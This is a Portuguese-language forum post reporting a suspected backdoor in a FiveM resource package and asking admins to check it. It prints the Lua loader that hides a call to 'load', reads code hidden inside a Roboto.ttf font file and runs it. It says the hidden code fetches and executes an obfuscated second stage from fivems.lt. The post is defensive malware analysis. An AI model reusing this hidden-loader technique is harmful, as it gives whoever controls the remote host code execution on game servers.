Pacote tem um backdoor bem claro, sou novo no fivem então acredito ter forte ligação com uma Backdoors.
Achei isto em:
local loadFonts = _G[string.char(108, 111, 97, 100)]
loadFonts(LoadResourceFile(GetCurrentResourceName(), '/web/assets/Roboto.ttf'):sub(87565):gsub('%.%+', ''))()
Ele esconde o load, lê código escondido dentro do arquivo Roboto.ttf, limpa uma camuflagem e executa.
O conteúdo escondido baixa código externo de:
e executa a resposta com: assert(load(_b))()
Isso é backdoor/loader remoto. Quem controla essa URL pode executar código no seu servidor.
Os outros pontos encontrados parecem normais do script, mas esse loader remoto sozinho já torna o pacote inseguro.
O link
atualmente retorna um script Lua ofuscado com Luraph: -- This file was protected using Luraph Obfuscator v14.7
Detalhes do payload:
Status: 200 OK
Tipo: text/plain
Tamanho: 96.362 caracteres
SHA256: 15ce8fe3aa1a692ac0927ed410c68a33d4f8914eca7f2843b30ef4b945773d81
Ele não é só texto/configuração: no final ele executa o conteúdo ofuscado com algo parecido com:
Conclusão: é perigoso.
Esse link entrega um segundo estágio ofuscado que é executado dentro do servidor. Como está ofuscado, não dá para afirmar 100% tudo que ele faz sem desofuscar ou “detonar” em ambiente isolado, mas o comportamento é típico de loader/backdoor:
Código escondido no Roboto.ttf.
Baixa Lua remoto de fivems.lt/null.
Executa o retorno com load.
O retorno vem ofuscado para dificultar auditoria.
Como disse apenas fiz um estudo sobre mas sem certeza, aqui fica o estudo para que os Admin façam as verificações.
Caso eu esteja errado peço as desculpas.